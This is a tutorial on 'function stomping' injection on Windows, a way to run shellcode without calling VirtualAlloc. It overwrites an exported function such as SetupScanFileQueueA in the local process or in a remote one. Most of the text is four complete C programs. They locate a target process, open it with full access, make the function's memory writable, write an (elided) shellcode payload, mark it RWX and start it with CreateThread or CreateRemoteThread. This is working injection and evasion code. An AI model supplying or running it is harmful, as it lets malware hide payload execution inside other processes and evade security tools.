Method that avoids the usage of VirtualAlloc/Ex WinAPI calls.
"Stomping" refers to overwriting or replacing the memory of a function or data structure with different data. It involves replacing a function's original bytes with new code, causing the function to either stop working as intended or execute different logic. To do this, a sacrificial function address needs to be replaced.
While retrieving the address of a function locally is straightforward, the challenge lies in selecting the appropriate function for stomping. Overwriting a frequently used function can lead to unpredictable behavior or system crashes. Therefore, it's advisable to target less commonly used functions, such as MessageBox, rather than those from critical system libraries like ntdll.dll or kernel32.dll.
Once a target function's bytes are replaced with the payload's, the function becomes unusable except for executing the payload. For instance, if MessageBoxA is the target function, the binary should only call MessageBoxA once, triggering the execution of the payload.
Local Function Stomping Injection
An example of a target function is SetupScanFileQueueA. Although this function is randomly selected, it's unlikely to cause any issues if overwritten. According to Microsoft's documentation, the function is exported from Setupapi.dll. Therefore, the initial step is to load Setupapi.dll into the local process memory using LoadLibraryA and then obtain the function's address using GetProcAddress.
The subsequent step involves stomping the function, replacing it with the payload. To ensure the function can be overwritten, its memory region is marked as readable and writable using VirtualProtect. Subsequently, the payload is written into the function's address, and finally, VirtualProtect is used again to designate the region as executable (RX or RWX).
Alternatively, instead of loading the DLL using LoadLibrary and then retrieving the target function's address with GetProcAddress, it's possible to statically link the DLL into the binary. This can be achieved using the pragma comment compiler directive. The target function can then be easily retrieved using the address-of-operator (e.g., &SetupScanFileQueueA).
Function stomping using LoadLibrary and GetProcAddress:
An alternative function stomping code without the need of getting the address of the target function using GetProcAddress, but by adding the dll to the binary by the compiler:
#include<Windows.h>#include<stdio.h>#include<setupapi.h>#pragmacomment (lib, "Setupapi.lib") // adding "setupapi.dll" to the import address tableunsignedchar Payload[]= {// shellcode};BOOL WritePayload(PVOID pAddress, PBYTE pPayload, SIZE_T sPayloadSize) { DWORD dwOldProtection =NULL;if (!VirtualProtect(pAddress, sPayloadSize, PAGE_READWRITE,&dwOldProtection)) {printf("[!] VirtualProtect [RW] Failed With Error : %d \n", GetLastError());returnFALSE; }memcpy(pAddress, pPayload, sPayloadSize);if (!VirtualProtect(pAddress, sPayloadSize, PAGE_EXECUTE_READWRITE,&dwOldProtection)) {printf("[!] VirtualProtect [RWX] Failed With Error : %d \n", GetLastError());returnFALSE; }returnTRUE;}intmain() { HANDLE hThread =NULL;printf("[+] Address Of \"SetupScanFileQueueA\" : 0x%p \n",&SetupScanFileQueueA);printf("[#] Press <Enter> To Write Payload ... ");getchar();printf("[i] Writing ... ");if (!WritePayload(&SetupScanFileQueueA, Payload,sizeof(Payload))) {return-1; }printf("[+] DONE \n");printf("[#] Press <Enter> To Run The Payload ... ");getchar(); hThread =CreateThread(NULL,NULL, SetupScanFileQueueA,NULL,NULL,NULL);if (hThread !=NULL)WaitForSingleObject(hThread, INFINITE);printf("[#] Press <Enter> To Quit ... ");getchar();return0;}
Remote Function Stomping Injection
The DLLs containing Windows API functions are shared among all processes using them. This means the functions within the DLL have the same address in each process. However, the address of the DLL itself may vary between processes due to Address Space Layout Randomization (ASLR). For instance, Kernel32.dll, a common DLL, might have different addresses in two processes, but functions like VirtualAlloc, exported from Kernel32.dll, will have the same address in both processes.
It's crucial to understand that for function stomping to work remotely, the DLL exporting the targeted function must already be loaded into the target process. For instance, if you want to target the SetupScanFileQueueA function in a remote process, which comes from Setupapi.dll, that DLL must be loaded into the target process beforehand. If Setupapi.dll isn't loaded into the remote process, attempting to use SetupScanFileQueueA will fail because the function won't be present, leading to an attempt to write to a nonexistent address.
Function stomping using LoadLibrary and GetProcAddress:
#include<Windows.h>#include<stdio.h>#include<Tlhelp32.h>#defineSACRIFICIAL_DLL"setupapi.dll"#defineSACRIFICIAL_FUNC"SetupScanFileQueueA"// x64 calc metasploit shellcode unsignedchar Payload[]= {// shellcode};BOOL GetRemoteProcessHandle(LPWSTR szProcessName, DWORD* dwProcessId, HANDLE* hProcess) { HANDLE hSnapShot =NULL; PROCESSENTRY32 Proc = { .dwSize =sizeof(PROCESSENTRY32) };// Takes a snapshot of the currently running processes hSnapShot =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);if (hSnapShot == INVALID_HANDLE_VALUE) {printf("\t[!] CreateToolhelp32Snapshot Failed With Error : %d \n", GetLastError());goto _EndOfFunction; }// Retrieves information about the first process encountered in the snapshot.if (!Process32First(hSnapShot,&Proc)) {printf("\n\t[!] Process32First Failed With Error : %d \n", GetLastError());goto _EndOfFunction; }do { WCHAR LowerName[MAX_PATH *2];if (Proc.szExeFile) { DWORD dwSize =lstrlenW(Proc.szExeFile); DWORD i =0;RtlSecureZeroMemory(LowerName, MAX_PATH *2);// converting each charachter in Proc.szExeFile to a lower case character and saving it// in LowerName to do the *wcscmp* call later ...if (dwSize < MAX_PATH *2) {for (; i < dwSize; i++) LowerName[i] = (WCHAR)tolower(Proc.szExeFile[i]); LowerName[i++] ='\0'; } }// compare the enumerated process path with what is passed, if equal ..if (wcscmp(LowerName, szProcessName)==0) {// we save the process id *dwProcessId =Proc.th32ProcessID;// we open a process handle and return*hProcess =OpenProcess(PROCESS_ALL_ACCESS,FALSE,Proc.th32ProcessID);if (*hProcess ==NULL)printf("\n\t[!] OpenProcess Failed With Error : %d \n", GetLastError());break; }// Retrieves information about the next process recorded the snapshot. } while (Process32Next(hSnapShot,&Proc));// while we can still have a valid output ftom Process32Net, continue looping_EndOfFunction:if (hSnapShot !=NULL)CloseHandle(hSnapShot);if (*dwProcessId ==NULL||*hProcess ==NULL)returnFALSE;returnTRUE;}BOOL WritePayload(HANDLE hProcess, PVOID pAddress, PBYTE pPayload, SIZE_T sPayloadSize) { DWORD dwOldProtection =NULL; SIZE_T sNumberOfBytesWritten =NULL;if (!VirtualProtectEx(hProcess, pAddress, sPayloadSize, PAGE_READWRITE,&dwOldProtection)) {printf("[!] VirtualProtectEx [RW] Failed With Error : %d \n", GetLastError());returnFALSE; } if (!WriteProcessMemory(hProcess, pAddress, pPayload, sPayloadSize, &sNumberOfBytesWritten) || sPayloadSize != sNumberOfBytesWritten){
printf("[!] WriteProcessMemory Failed With Error : %d \n", GetLastError());printf("[!] Bytes Written : %d of %d \n", sNumberOfBytesWritten, sPayloadSize);returnFALSE; }if (!VirtualProtectEx(hProcess, pAddress, sPayloadSize, PAGE_EXECUTE_READWRITE,&dwOldProtection)) {printf("[!] VirtualProtectEx [RWX] Failed With Error : %d \n", GetLastError());returnFALSE; }returnTRUE;}/* !!!! THE TARGET PROCESS MUST HAVE "SACRIFICIAL_DLL" LOADED !!!! */intwmain(int argc,wchar_t* argv[]) { HANDLE hProcess =NULL, hThread =NULL; PVOID pAddress =NULL; DWORD dwProcessId =NULL; HMODULE hModule =NULL;if (argc <2) {wprintf(L"[!] Usage : \"%s\" <Process Name> \n", argv[0]);return-1; }wprintf(L"[i] Searching For Process Id Of \"%s\" ... ", argv[1]);if (!GetRemoteProcessHandle(argv[1],&dwProcessId,&hProcess)) {printf("[!] Process is Not Found \n");return-1; }printf("[+] DONE \n");printf("[i] Found Target Process Pid: %d \n", dwProcessId);printf("[i] Loading \"%s\"... ", SACRIFICIAL_DLL); hModule =LoadLibraryA(SACRIFICIAL_DLL);if (hModule ==NULL) {printf("[!] LoadLibraryA Failed With Error : %d \n", GetLastError());return-1; }printf("[+] DONE \n"); pAddress =GetProcAddress(hModule, SACRIFICIAL_FUNC);if (pAddress ==NULL) {printf("[!] GetProcAddress Failed With Error : %d \n", GetLastError());return-1; }printf("[+] Address Of \"%s\" : 0x%p \n", SACRIFICIAL_FUNC, pAddress);printf("[#] Press <Enter> To Write Payload ... ");getchar();printf("[i] Writing ... ");if (!WritePayload(hProcess, pAddress, Payload,sizeof(Payload))) {return-1; }printf("[+] DONE \n");printf("[#] Press <Enter> To Run The Payload ... ");getchar(); hThread =CreateRemoteThread(hProcess,NULL,NULL, pAddress,NULL,NULL,NULL);if (hThread !=NULL)WaitForSingleObject(hThread, INFINITE);printf("[#] Press <Enter> To Quit ... ");getchar();return0;}
An alternative function stomping code without the need of getting the address of the target function using GetProcAddress, but by adding the dll to the binary by the compiler:
#include<Windows.h>#include<stdio.h>#include<Tlhelp32.h>#include<SetupApi.h>#pragmacomment (lib, "Setupapi.lib") // adding "setupapi.dll" to the import address tableunsignedchar Payload[]= {//shellcode};BOOL GetRemoteProcessHandle(LPWSTR szProcessName, DWORD* dwProcessId, HANDLE* hProcess) { HANDLE hSnapShot =NULL; PROCESSENTRY32 Proc = { .dwSize =sizeof(PROCESSENTRY32) };// Takes a snapshot of the currently running processes hSnapShot =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);if (hSnapShot == INVALID_HANDLE_VALUE) {printf("\t[!] CreateToolhelp32Snapshot Failed With Error : %d \n", GetLastError());goto _EndOfFunction; }// Retrieves information about the first process encountered in the snapshot.if (!Process32First(hSnapShot,&Proc)) {printf("\n\t[!] Process32First Failed With Error : %d \n", GetLastError());goto _EndOfFunction; }do { WCHAR LowerName[MAX_PATH *2];if (Proc.szExeFile) { DWORD dwSize =lstrlenW(Proc.szExeFile); DWORD i =0;RtlSecureZeroMemory(LowerName, MAX_PATH *2);// converting each charachter in Proc.szExeFile to a lower case character and saving it// in LowerName to do the *wcscmp* call later ...if (dwSize < MAX_PATH *2) {for (; i < dwSize; i++) LowerName[i] = (WCHAR)tolower(Proc.szExeFile[i]); LowerName[i++] ='\0'; } }// compare the enumerated process path with what is passed, if equal ..if (wcscmp(LowerName, szProcessName)==0) {// we save the process id *dwProcessId =Proc.th32ProcessID;// we open a process handle and return*hProcess =OpenProcess(PROCESS_ALL_ACCESS,FALSE,Proc.th32ProcessID);if (*hProcess ==NULL)printf("\n\t[!] OpenProcess Failed With Error : %d \n", GetLastError());break; }// Retrieves information about the next process recorded the snapshot. } while (Process32Next(hSnapShot,&Proc));// while we can still have a valid output ftom Process32Net, continue looping_EndOfFunction:if (hSnapShot !=NULL)CloseHandle(hSnapShot);if (*dwProcessId ==NULL||*hProcess ==NULL)returnFALSE;returnTRUE;}BOOL WritePayload(HANDLE hProcess, PVOID pAddress, PBYTE pPayload, SIZE_T sPayloadSize) { DWORD dwOldProtection =NULL; SIZE_T sNumberOfBytesWritten =NULL;if (!VirtualProtectEx(hProcess, pAddress, sPayloadSize, PAGE_READWRITE,&dwOldProtection)) {printf("[!] VirtualProtectEx [RW] Failed With Error : %d \n", GetLastError());returnFALSE; } if (!WriteProcessMemory(hProcess, pAddress, pPayload, sPayloadSize, &sNumberOfBytesWritten) || sPayloadSize != sNumberOfBytesWritten) {
printf("[!] WriteProcessMemory Failed With Error : %d \n", GetLastError());printf("[!] Bytes Written : %d of %d \n", sNumberOfBytesWritten, sPayloadSize);returnFALSE; }if (!VirtualProtectEx(hProcess, pAddress, sPayloadSize, PAGE_EXECUTE_READWRITE,&dwOldProtection)) {printf("[!] VirtualProtectEx [RWX] Failed With Error : %d \n", GetLastError());returnFALSE; }returnTRUE;}intwmain(int argc,wchar_t* argv[]) { HANDLE hProcess =NULL, hThread =NULL; DWORD dwProcessId =NULL; HMODULE hModule =NULL;if (argc <2) {wprintf(L"[!] Usage : \"%s\" <Process Name> \n", argv[0]);return-1; }wprintf(L"[i] Searching For Process Id Of \"%s\" ... ", argv[1]);if (!GetRemoteProcessHandle(argv[1],&dwProcessId,&hProcess)) {printf("[!] Process is Not Found \n");return-1; }printf("[+] DONE \n");printf("[i] Found Target Process Pid: %d \n", dwProcessId);printf("[+] Address Of \"SetupScanFileQueueA\" : 0x%p \n",&SetupScanFileQueueA);printf("[#] Press <Enter> To Write Payload ... ");getchar();printf("[i] Writing ... ");if (!WritePayload(hProcess,&SetupScanFileQueueA, Payload,sizeof(Payload))) {return-1; }printf("[+] DONE \n");printf("[#] Press <Enter> To Run The Payload ... ");getchar(); hThread =CreateRemoteThread(hProcess,NULL,NULL, SetupScanFileQueueA,NULL,NULL,NULL);if (hThread !=NULL)WaitForSingleObject(hThread, INFINITE);printf("[#] Press <Enter> To Quit ... ");getchar();return0;}